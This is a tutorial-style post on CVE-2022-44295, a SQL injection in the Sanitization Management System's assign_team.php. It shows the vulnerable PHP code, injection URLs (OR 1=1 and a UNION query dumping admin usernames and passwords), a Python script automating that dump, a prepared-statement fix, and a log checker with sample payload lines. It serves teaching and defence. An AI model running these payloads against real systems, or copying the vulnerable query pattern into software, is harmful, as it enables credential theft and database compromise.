Sanitization Management System v1. is a web-based solution used by facilities and organizations to track, assign, and manage sanitation tasks and teams. In 2022, a severe security flaw was identified in it that lets attackers compromise the database through SQL Injection, a well-known class of attack against database-backed web applications. This vulnerability is tracked as CVE-2022-44295.

In this post, we'll break down what this vulnerability is, how it can be exploited, and how to fix it, with example code. We'll keep things simple so even beginners can follow along.

What is CVE-2022-44295?

CVE-2022-44295 is a SQL Injection vulnerability in Sanitization Management System v1., specifically in the admin order-assignment script:

/php-sms/admin/orders/assign_team.php?id=

An attacker can manipulate the id parameter and force the system to run unintended SQL commands, for example to read sensitive data or to modify or even delete database content.

How SQL Injection Works

SQL Injection happens when an application doesn’t properly check user inputs before adding them to a database query. This lets attackers "inject" malicious SQL commands as part of their input.

Here’s what the original vulnerable code might look like inside assign_team.php:

```php
<?php
// Vulnerable code snippet
include("db_connect.php");   // sets up the $con mysqli connection

$id = $_GET['id'];           // untrusted input taken straight from the URL
$sql = "SELECT * FROM orders WHERE id = $id";   // spliced into the query unescaped
$result = mysqli_query($con, $sql);
// ... process results ...
?>
```

Notice: the code takes id straight from the URL and splices it into the SQL query string without validating or escaping it.

A normal user might visit:

http://example.com/php-sms/admin/orders/assign_team.php?id=5

But an attacker could use:

http://example.com/php-sms/admin/orders/assign_team.php?id=5%20OR%201=1

This changes the SQL to:

```sql
SELECT * FROM orders WHERE id = 5 OR 1=1
```

Now, all orders will be selected because 1=1 is always true.

Attackers could even dump sensitive data:

http://example.com/php-sms/admin/orders/assign_team.php?id=%20UNION%20SELECT%201,username,password,4%20FROM%20admins

This would sneak in a query that returns usernames and passwords from the admins table!

Here’s a Python script to automate this exploit and dump admin usernames and passwords:

```python
import requests

URL = "http://target/php-sms/admin/orders/assign_team.php"
payload = " UNION SELECT 1,username,password,4 FROM admins"

r = requests.get(URL, params={"id": payload})

print(r.text)
```

*Replace http://target with the real site URL. Use only on systems you own or have permission to test!*

The fix is to stop building the query text from raw input. Here’s a safe way using PHP and mysqli prepared statements:

```php
include("db_connect.php");          // provides the $con mysqli connection
$id = (int) $_GET['id'];            // order ids are integers, so cast first
$stmt = $con->prepare("SELECT * FROM orders WHERE id = ?");
$stmt->bind_param("i", $id);        // bound as an integer parameter, never spliced into SQL
$stmt->execute();
$result = $stmt->get_result();
```

Because the value reaches the database as a bound parameter rather than being pasted into the query text, anything an attacker puts in id is treated as data, not as SQL, so the OR 1=1 and UNION tricks above no longer work.

References and Sources

- NVD Entry for CVE-2022-44295
- Exploit Database PoC #51020
- Common vulnerabilities: SQL Injection explained

Final Thoughts

CVE-2022-44295 is a classic example of why secure coding practices (like input validation and prepared statements) matter. Exploits like this can lead to full system compromise. If you run Sanitization Management System v1., patch it and check your web server logs for suspicious requests to assign_team.php immediately.
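As an added example (not from the original post or the project), here is a small Python log check that does what the advice above asks for: it flags requests to assign_team.php whose id parameter is anything other than a plain integer. The access-log lines are constructed in common log format, and the payloads mirror the ones shown earlier in the post.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Nov/2022:18:20:01 +0000] "GET /php-sms/admin/orders/assign_team.php?id=5 HTTP/1.1" 200 812
203.0.113.10 - - [30/Nov/2022:18:20:09 +0000] "GET /php-sms/admin/orders/assign_team.php?id=5%20OR%201=1 HTTP/1.1" 200 9120
203.0.113.10 - - [30/Nov/2022:18:20:15 +0000] "GET /php-sms/admin/orders/assign_team.php?id=%20UNION%20SELECT%201,username,password,4%20FROM%20admins HTTP/1.1" 200 1450
203.0.113.11 - - [30/Nov/2022:18:21:00 +0000] "GET /php-sms/admin/orders/index.php HTTP/1.1" 200 2048
"""

TARGET_PATH = "/php-sms/admin/orders/assign_team.php"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"\d+")


def suspicious_ids(log_text):
    """Return (line_number, decoded_id) for every request to the vulnerable
    script whose id parameter is not a plain integer. A legitimate order id
    is numeric, so anything else deserves a closer look."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlparse(match.group(1))
        if url.path != TARGET_PATH:
            continue
        # parse_qs percent-decodes once; unquote again so a double-encoded
        # payload (%2520 -> %20 -> space) is still judged in its final form.
        for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
            value = unquote(raw)
            if not INTEGER_RE.fullmatch(value):
                hits.append((line_no, value))
    return hits


if __name__ == "__main__":
    for line_no, value in suspicious_ids(SAMPLE_LOG):
        print(f"line {line_no}: suspicious id={value!r}")
```

Running it against the sample flags lines 2 and 3 (the OR 1=1 and UNION payloads) and ignores the normal id=5 request and the unrelated index.php hit.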

Timeline

Published on: 11/30/2022 18:15:00 UTC
Last modified on: 12/01/2022 02:27:00 UTC